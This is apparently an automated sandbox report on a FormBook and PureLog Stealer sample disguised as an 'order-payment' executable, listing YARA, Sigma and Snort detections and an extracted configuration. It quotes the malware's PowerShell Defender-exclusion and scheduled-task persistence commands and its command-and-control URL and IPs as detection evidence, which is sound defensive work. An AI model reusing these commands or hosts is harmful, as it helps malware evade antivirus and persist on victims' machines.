9.2.order-payment094093.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.2.order-payment094093.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.order-payment094093.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
0.2.order-payment094093.exe.9770000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.order-payment094093.exe.2f88c64.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.order-payment094093.exe.4ae7560.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.order-payment094093.exe.4ae7560.5.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.order-payment094093.exe.4ae7560.5.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x75e71:$a1: 3C 30 50 4F 53 54 74 09 40 0xa4291:$a1: 3C 30 50 4F 53 54 74 09 40 0xd16b1:$a1: 3C 30 50 4F 53 54 74 09 40 0x8c7e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xbac00:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xe8020:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7a5ef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xa8a0f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xd5e2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x854d7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xb38f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0xe0d17:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.order-payment094093.exe.4ae7560.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x79528:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x797a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa7948:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa7bc2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd4d68:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xd4fe2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x852d5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xb36f5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xe0b15:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x84dc1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xb31e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xe0601:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x853d7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xb37f7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xe0c17:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x8554f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb396f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe0d8f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7a1ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xa85da:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0xd59fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.order-payment094093.exe.4ae7560.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x88469:$sqlite3step: 68 34 1C 7B E1 0x8857c:$sqlite3step: 68 34 1C 7B E1 0xb6889:$sqlite3step: 68 34 1C 7B E1 0xb699c:$sqlite3step: 68 34 1C 7B E1 0xe3ca9:$sqlite3step: 68 34 1C 7B E1 0xe3dbc:$sqlite3step: 68 34 1C 7B E1 0x88498:$sqlite3text: 68 38 2A 90 C5 0x885bd:$sqlite3text: 68 38 2A 90 C5 0xb68b8:$sqlite3text: 68 38 2A 90 C5 0xb69dd:$sqlite3text: 68 38 2A 90 C5 0xe3cd8:$sqlite3text: 68 38 2A 90 C5 0xe3dfd:$sqlite3text: 68 38 2A 90 C5 0x884ab:$sqlite3blob: 68 53 D8 7F 8C 0x885d3:$sqlite3blob: 68 53 D8 7F 8C 0xb68cb:$sqlite3blob: 68 53 D8 7F 8C 0xb69f3:$sqlite3blob: 68 53 D8 7F 8C 0xe3ceb:$sqlite3blob: 68 53 D8 7F 8C 0xe3e13:$sqlite3blob: 68 53 D8 7F 8C
9.2.order-payment094093.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
9.2.order-payment094093.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
9.2.order-payment094093.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
9.2.order-payment094093.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.order-payment094093.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
0.2.order-payment094093.exe.2f87c4c.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.NFOLsr.exe.33aae0c.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.order-payment094093.exe.2f4ae90.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.NFOLsr.exe.33e7bc8.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
11.2.NFOLsr.exe.33e8be0.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.order-payment094093.exe.4a77940.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.order-payment094093.exe.4a77940.6.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.order-payment094093.exe.4a77940.6.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xe5a91:$a1: 3C 30 50 4F 53 54 74 09 40 0x113eb1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1412d1:$a1: 3C 30 50 4F 53 54 74 09 40 0xfc400:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x12a820:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x157c40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xea20f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x11862f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x145a4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0xf50f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x123517:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x150937:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.order-payment094093.exe.4a77940.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xe9148:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xe93c2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x117568:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1177e2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x144988:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x144c02:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xf4ef5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x123315:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x150735:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0xf49e1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x122e01:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x150221:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0xf4ff7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x123417:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x150837:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0xf516f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x12358f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1509af:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xe9dda:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1181fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x14561a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.order-payment094093.exe.4a77940.6.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0xf8089:$sqlite3step: 68 34 1C 7B E1 0xf819c:$sqlite3step: 68 34 1C 7B E1 0x1264a9:$sqlite3step: 68 34 1C 7B E1 0x1265bc:$sqlite3step: 68 34 1C 7B E1 0x1538c9:$sqlite3step: 68 34 1C 7B E1 0x1539dc:$sqlite3step: 68 34 1C 7B E1 0xf80b8:$sqlite3text: 68 38 2A 90 C5 0xf81dd:$sqlite3text: 68 38 2A 90 C5 0x1264d8:$sqlite3text: 68 38 2A 90 C5 0x1265fd:$sqlite3text: 68 38 2A 90 C5 0x1538f8:$sqlite3text: 68 38 2A 90 C5 0x153a1d:$sqlite3text: 68 38 2A 90 C5 0xf80cb:$sqlite3blob: 68 53 D8 7F 8C 0xf81f3:$sqlite3blob: 68 53 D8 7F 8C 0x1264eb:$sqlite3blob: 68 53 D8 7F 8C 0x126613:$sqlite3blob: 68 53 D8 7F 8C 0x15390b:$sqlite3blob: 68 53 D8 7F 8C 0x153a33:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 23 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order-payment094093.exe", ParentImage: C:\Users\user\Desktop\order-payment094093.exe, ParentProcessId: 1136, ParentProcessName: order-payment094093.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe", ProcessId: 2020, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpF3AA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpF3AA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\NFOLsr.exe, ParentImage: C:\Users\user\AppData\Roaming\NFOLsr.exe, ParentProcessId: 4996, ParentProcessName: NFOLsr.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpF3AA.tmp", ProcessId: 2536, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\order-payment094093.exe", ParentImage: C:\Users\user\Desktop\order-payment094093.exe, ParentProcessId: 1136, ParentProcessName: order-payment094093.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp", ProcessId: 3320, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\order-payment094093.exe", ParentImage: C:\Users\user\Desktop\order-payment094093.exe, ParentProcessId: 1136, ParentProcessName: order-payment094093.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\order-payment094093.exe", ProcessId: 2020, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\order-payment094093.exe", ParentImage: C:\Users\user\Desktop\order-payment094093.exe, ParentProcessId: 1136, ParentProcessName: order-payment094093.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NFOLsr" /XML "C:\Users\user\AppData\Local\Temp\tmpC97D.tmp", ProcessId: 3320, ProcessName: schtasks.exe

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 104.18.188.223

Timestamp:	05/08/24-09:41:14.646552
SID:	2031412
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	05/08/24-09:40:54.313998
SID:	2031412
Source Port:	49715
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 192.64.119.254

Timestamp:	05/08/24-09:40:34.397123
SID:	2031412
Source Port:	49713
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 15.197.142.173

Timestamp:	05/08/24-09:41:34.950251
SID:	2031412
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: order-payment094093.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\NFOLsr.exe

Avira: detection malicious, Label: HEUR/AGEN.1304427

Found malware configuration

Source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.vagabondtracks.com/hd05/"], "decoy": ["businessjp6-51399.info", "countyyoungpest.com", "taxilasamericas.com", "stairs.parts", "nrgsolutions.us", "cbdgirl.guru", "dropshunter.net", "adorabubble.co.za", "alcohomeexteriors.com", "aquariusbusiness.info", "zaginione.com", "pintoresmajadahonda.com", "fursace.club", "musiletras.co", "carpoboutiquehotel.com", "redacted.investments", "symplywell.me", "lezxop.xyz", "stmbbill.com", "1509068.cc", "savdesign.online", "gaiacoreresearch.com", "pivoluvva-usa.com", "kathrynmirabella.com", "ziplnk.xyz", "furanoikedanouen.com", "regenesisvista.world", "lorenzodavissr.com", "friendlyemporium.com", "7727.info", "moledistillery.com", "geturpdtaemza.com", "sparkfirestarter.net", "q3hjns.shop", "thingsidonaked.com", "attack.info", "salihkaradag.com", "vn6b6q.com", "thierrydoublein.com", "buddhasiddhartha.com", "uniqueofferss.com", "trexendofparadise.club", "evans-gdaddy-test-domain.online", "kgroundx.com", "2us7o.us", "damtherncooling.com", "kakashi-hatake.shop", "blogonrunning.com", "lovepox.com", "ramediatech.online", "satwaspin.net", "greenink.store", "tuskerlogix.com", "codyscalls.com", "system.ngo", "connect-talent.com", "addck.top", "teramilab.com", "yuyuklmn123888yy.xyz", "9orwr6.vip", "nubeqa77.life", "lmpalmour.com", "sandeshkrantinews.in", "find-buildings.com"]}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\NFOLsr.exe

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: order-payment094093.exe	Virustotal: Detection: 55%			Perma Link
Source: order-payment094093.exe	ReversingLabs: Detection: 34%

Yara detected FormBook

Source: Yara match	File source: 9.2.order-payment094093.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.4ae7560.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.order-payment094093.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.order-payment094093.exe.4a77940.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.3317866770.00000000036F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2197036751.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2359960797.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3317227992.00000000032F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3318427061.00000000050F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2125511708.00000000048A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3320712611.0000000006470000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\NFOLsr.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: order-payment094093.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\order-payment094093.exe

Unpacked PE file: 0.2.order-payment094093.exe.b30000.0.unpack

Source: order-payment094093.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: order-payment094093.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: explorer.pdbUGP source: order-payment094093.exe, 00000009.00000002.2202520951.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.3315058367.0000000000A90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: netsh.pdb source: explorer.exe, 0000000D.00000003.2332553204.0000000003371000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3317370398.0000000003385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2332553204.0000000003382000.00000004.00000020.00020000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2358827097.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2359854782.0000000001220000.00000040.10000000.00040000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2358827097.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2359821107.0000000000A60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: order-payment094093.exe, 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3318733475.000000000543E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2202446701.00000000050F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3318733475.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2197656658.0000000004EF1000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000003.2357151463.0000000003592000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000003.2358821088.0000000003744000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2360599278.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2360599278.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: netsh.pdbGCTL source: explorer.exe, 0000000D.00000003.2332553204.0000000003371000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3317370398.0000000003385000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2332553204.0000000003382000.00000004.00000020.00020000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2358827097.0000000000E8D000.00000004.00000020.00020000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2359854782.0000000001220000.00000040.10000000.00040000.00000000.sdmp, NFOLsr.exe, 00000012.00000002.2358827097.0000000000EA6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2359821107.0000000000A60000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: order-payment094093.exe, order-payment094093.exe, 00000009.00000002.2198084111.00000000011F0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 0000000D.00000002.3318733475.000000000543E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2202446701.00000000050F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3318733475.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2197656658.0000000004EF1000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000003.2357151463.0000000003592000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000003.2358821088.0000000003744000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2360599278.00000000038F0000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000016.00000002.2360599278.0000000003A8E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: explorer.pdb source: order-payment094093.exe, 00000009.00000002.2202520951.0000000002F00000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.3315058367.0000000000A90000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then mov eax, dword ptr [ebp-28h]	0_2_054462F1
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_0544B7E8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	0_2_0544966C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	0_2_098B9694
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then xor edx, edx	0_2_098BA540
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then push dword ptr [ebp-20h]	0_2_098BA2E8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_098BA2E8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then push dword ptr [ebp-24h]	0_2_098BA608
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh	0_2_098BA608
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 4x nop then pop esi	9_2_0041732B
